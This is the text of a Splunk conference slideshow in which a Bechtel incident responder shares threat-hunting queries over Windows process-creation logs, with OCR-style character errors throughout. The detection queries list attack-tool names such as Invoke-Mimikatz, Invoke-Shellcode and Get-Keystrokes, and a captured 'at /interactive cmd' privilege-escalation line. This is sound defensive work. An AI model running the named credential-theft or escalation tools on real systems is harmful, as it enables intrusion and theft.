Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Bechtel Customer Presentation

1,463 views

Published on

Bechtel Customer Presentation

Published in: Technology
  • Be the first to comment

Bechtel Customer Presentation

  1. 1. Copyright © 2014 Splunk Inc. Security Opera;ons: Hun$ng Wabbits, Possum, and APT Ryan Chapman Bechtel Corpora;on
  2. 2. 2 Disclaimer During the course of this presenta;on, we may make forward looking statements regarding future events or the expected performance of the company. We cau;on you that such statements reflect our current expecta;ons and es;mates based on factors currently known to us and that actual events or results could differ materially. For important factors that may cause actual results to differ from those contained in our forward-looking statements, please review our filings with the SEC. The forward- looking statements made in the this presenta;on are being made as of the ;me and date of its live presenta;on. If reviewed aRer its live presenta;on, this presenta;on may not contain current or accurate informa;on. We do not assume any obliga;on to update any forward looking statements we may make. In addi;on, any informa;on about our roadmap outlines our general product direc;on and is subject to change at any ;me without no;ce. It is for informa;onal purposes only and shall not, be incorporated into any contract or other commitment. Splunk undertakes no obliga;on either to develop the features or func;onality described or to include any such feature or func;onality in a future release.
  3. 3. 3 Agenda •  Intro to Bechtel •  Who’s This Guy? •  Overview of Security @ Bechtel •  Why Splunk? •  Hun$ng Tips and Tricks
  4. 4. 4 Bechtel Corpora;on •  Largest Engineering, Construc;on, & PM Company in the U.S. •  55,400 colleagues | 25,000 projects | 160 countries | 7 con;nents •  Target Rich Environment – Global Threats •  2012 Goal: Develop World-Class SOC
  5. 5. 5 Ryan J. Chapman •  Computer Incident Response Team (CIRT) –  Network Security Monitoring Analyst •  Incident Handler •  CIRT / SOC Liaison •  “Did You Check Splunk?” Guy ê  No, Really. Did You Check Splunk? @rj_chap
  6. 6. 6 It Takes A Village! •  We ALL Par$cipate in Hun$ng •  Bechtel SOC & CIRT –  SOC: Time Allocated –  CIRT: Required During On-Call •  Tribal Training + “Security Blitz” + “Tech Talks” •  Example of a Rockstar: –  Keith Tyler (@keithtyler) ê FANTASTIC Hunter!
  7. 7. Security @ Bechtel
  8. 8. 8 Post Remedia;on Structure
  9. 9. 9 APT Events Use Case BEFORE SPLUNK AFTER SPLUNK Event Escala$on to CIRT • 99% of Events • 2013-2014: < 3% • 2015: < 1% APT Events Detected •  1 APT Event •  2013: 269 APT Events •  2014: 82 APT Events
  10. 10. 10 The Security Stack External Intense Monitoring Full Packet Capture DNS Protec$on Network Event Parsing Firewall Applica$on Firewall Email Blocking Behavior Analysis APT Detec$on Forensics AV Log Forwarding Remediate Detect Respond Deter
  11. 11. 11 Why Splunk? •  Beuer than GREP? •  Parsing Individual Logs? –  2.35TB/day License •  Primary Uses: –  Alert Genera;on –  Incident Handling / Response ê  The “5 W’s” –  HUNTING Because it’s Awesome!
  12. 12. 12 Obligatory Splunk Quote “We wouldn’t be able to do our jobs without Splunk.”
  13. 13. Hun;ng Tac;cs
  14. 14. 14 •  Ask Ques;ons –  BE INQUISITIVE NOSY –  Read Ar;cles / Twiuer / OSINT •  Develop Queries –  Create Baselines / Tune Queries •  Implement Saved Searches •  Allocate Time for Hun$ng The Hunter Mentality Be like water… but also mimic a nosy neighbor
  15. 15. Go Home Word, You’re Drunk
  16. 16. 16 Word Up! Tell Your Brother, Your Sister, and Your Momma Too… •  Word Files = Common Carrier File •  Easy to Weaponize –  VBA / Macro –  CVE-based Exploit (Metasploit) •  Weaponized Files Launch… –  All The Things Q: Is Word Launching… Stuff?
  17. 17. 17 The Sobriety Test index=wls* EventID=4688 CreatorProcessName="WINWORD" Signed=False NOT (NewProcessName="C:Windows*" OR NewProcessName="C:Progra*") | table _time, host, SubjectUserName, BaseFileName, CommandLine, NewProcessName, MD5 NOTE: “Audit Process Crea0on” must be enabled
  18. 18. 18 Test Results: INEBRIATED _$me host Base FileName NewProcessName MD5 11/9/15 15:35 [DERP] Purchase Order rd2015 oct-dec #40098.exe C:Users[DERP] AppDataLocal TempPurchase Order rd2015 oct- dec #40098.exe EFF6EBFD48A 669FE9C2E62 B0E82561CE
  19. 19. 19 What’cha Drinking?
  20. 20. 20 What About Malicious Scripts? THE LAUNCH CODES ARE BAD! DO NOT LAUNCH! •  Common Script Handlers: –  cscript / wscript / powershell ß These Run Scripts •  Carrier File Handlers: –  Word (doc) –  Excel (xls) –  PowerPoint (ppt) –  Adobe Reader (pdf) –  Etc.
  21. 21. 21 The Pwnie Express index=wls EventID=4688 (CommandLine="*cscript*" OR CommandLine="*wscript*" OR CommandLine="*powershell*") (CreatorProcessName="WINWORD" OR CreatorProcessName="POWERPNT" OR CreatorProcessName="EXCEL" OR CreatorProcessName="Adobe*") | table _time, host, SubjectUserName, CreatorProcessName, BaseFileName, CommandLine ‘Cause They Are Carrier Files!
  22. 22. 22 I “C” A Script _$me host Creator Process Name Base FileName CommandLine 01/24/16 22:49:03 [DERP] EXCEL cscript.exe cscript 'C:Users [DERP]Desktop Databases_Public Loto Permit Excel reg_seing.vbs'
  23. 23. Scheduled Tasks via at.exe
  24. 24. 24 Scheduled Tasks SCHTASKS vs. AT •  schtasks.exe – Common Task Scheduler/Viewer •  at.exe –  Deprecated, but Available Through Windows 7 –  Historically Used for Privilege Escala;on (WinXP) ê Ajackers S$ll Love It (Older Admins Too) –  Creates `%System_Root%/Tasks/at[0-9].job` Files ê Sweep Enterprise for These & Analyze! Q: Anyone Running at.exe?
  25. 25. 25 The Query Anyone Running at.exe? index=wls EventID=4688 BaseFileName="at.exe" CommandLine="*" NOT BaseFileName="[known good]" NOT CommandLine="[known good]" | table …
  26. 26. 26 Nothing Silly Recently But A Few Years Ago… _$me host Base FileName CommandLine Creator Process Name 06/06/11 04:01 [DERP] at.exe at 04:03 /interac$ve cmd /c cmd.exe cmd
  27. 27. Remote Powershell
  28. 28. 28 PowerShell Shenanigans Auackers LOVE PowerShell   Why Are Auackers Using PowerShell? –  Powerful, Built-in Tool – (Nearly) Always Available –  Can Execute in Memory (Diskless) –  Easy to Avoid Detec;on ê A Hacker’s Best Toolkit = Tools on the Box!   PowerShell is a Growing Concern –  See: PowerSploit Framework
  29. 29. 29 PowerShell Snooping Brainstorming   Discussion: Event Code 4688 vs. 4103/4   We Already Look for Encoded PS Commands –  See: “Splunk Live! Santa Clara 2015” Talk   What About Remote PS Access Methods? –  PowerShell Can Run Remote Scripts Q: Is Anyone Running Remote PS Commands?
  30. 30. 30 Remote PowerShell Just a Few Samples…   Common Remote Methods: Get-Service winrm Enable-PSRemoting New-PSSession Enter-PSSession Invoke-Command –computername General use of: –computer NOTE: -computer can specify 127.0.0.1)
  31. 31. 31 PowerShell: WSMan
  32. 32. 32 PowerShell Search Remote Methods = Auacker’s Forte index=wls* EventID=4688 BaseFileName=powershell.exe (CommandLine="*winrm*" OR CommandLine="*psremoting*" OR CommandLine="*pssession*" OR CommandLine="*invoke-command*" OR CommandLine="*wsman*" [OR CommandLine="*-computer*"]) | table …
  33. 33. 33 PowerShellMafia’s PowerSploit Dirty Dirty Tricks   Open Source PowerShell Auack Framework –  Becoming More and More Common   We Can Enumerate All PowerSploit PS Modules –  And Look For Them ê  And yell/cry/smile if we find any Q: Is Anyone Running PowerSploit? (BETTER NOT BE!)
  34. 34. 34 “A PowerShell Post-Exploita;on Framework”
  35. 35. 35 Enumerated PowerSploit Modules index=wls* EventID=4688 (BaseFileName=powershell.exe OR BaseFileName=cmd.exe) (CommandLine="*powersploit*" OR CommandLine="*Invoke-DllInjection*" OR CommandLine="*Invoke-ReflectivePEInjection*" OR CommandLine="*Invoke-Shellcode*" OR CommandLine="*Invoke-WmiCommand*" OR CommandLine="*Out-EncodedCommand*" OR CommandLine="*Out-CompressedDll*" OR CommandLine="*Out-EncryptedScript*" OR CommandLine="*Remove-Comments*" OR CommandLine="*New-UserPersistenceOption*" OR CommandLine="*New-ElevatedPersistenceOption*" OR CommandLine="*Add-Persistence*" OR CommandLine="*Install-SSP*" OR CommandLine="*Get-SecurityPackages*" OR CommandLine="*Find-AVSignature*" OR CommandLine="*Invoke-TokenManipulation*" OR CommandLine="*Invoke-CredentialInjection*" OR CommandLine="*Invoke-NinjaCopy*" OR CommandLine="*Invoke-Mimikatz*" OR CommandLine="*Get-Keystrokes*" OR CommandLine="*Get-GPPPassword*" OR CommandLine="*Get-TimedScreenshot*" OR CommandLine="*New-VolumeShadowCopy*" OR CommandLine="*Get-VolumeShadowCopy*" OR CommandLine="*Mount-VolumeShadowCopy*" OR CommandLine="*Remove-VolumeShadowCopy*" OR CommandLine="*Get-VaultCredential*" OR CommandLine="*Out-Minidump*" OR CommandLine="*Set-MasterBootRecord*" OR CommandLine="*Set-CriticalProcess*" OR CommandLine="*PowerUp*" OR CommandLine="*Invoke-Portscan*" OR CommandLine="*Get- HttpStatus*" OR CommandLine="*Invoke-ReverseDnsLookup*" OR CommandLine="*PowerView*") | table …
  36. 36. Quick Example: Rogue svchost.exe
  37. 37. 37 svchost.exe w/Bad Parent smss.exe -> wininit.exe -> services.exe -> svchost.exe index=wls EventID=4688 BaseFileName="svchost.exe" NOT CreatorProcessName="services" | table …
  38. 38. Quick Example: CLI> blah [IPv4] blah
  39. 39. 39 IPv4 Addresses in CLI The Internet is a Scary Place index=wls* EventID=4688 CommandLine="*" NOT BaseFileName=cscript.exe OR BaseFileName=nslookup.exe OR BaseFileName=cmd.exe OR BaseFileName=ping.exe OR BaseFileName=nblookup.exe OR BaseFileName=route.exe) | regex CommandLine="sd{1,3}.d{1,3}. d{1,3}.d{1,3}s"
  40. 40. 40 Recap & Takeaways •  Ask Ques$ons –  Read Ar$cles / Twijer Feeds / OSINT Reports / etc. –  “Does This Happen Here?” •  Develop Queries •  Establish Baselines –  Tune Over Time •  Create Saved Searches •  Allocate Time For Hun$ng! Keep Hun;n’!
  41. 41. 41 Resources •  Windows Logging Service (WLS) Home Page –  By Jason McCord (@digira;82) –  hups://digira;82.com/wls-informa;on/ •  “Know your Windows Processes or Die Trying” –  Ar;cle by Patrick Olsen, 2014/01/18 –  hup://sysforensics.org/2014/01/know-your-windows-processes/ •  Bechtel Splunk Live! Santa Clara 2015 Preso –  hup://www.slideshare.net/Splunk/bechtel-customer-presenta;on Keep Hun;n’!
  42. 42. Thank You Security Opera;ons: Hun$ng Wabbits, Possum, and APT Ryan Chapman – @rj_chap Bechtel QUESTIONS?

×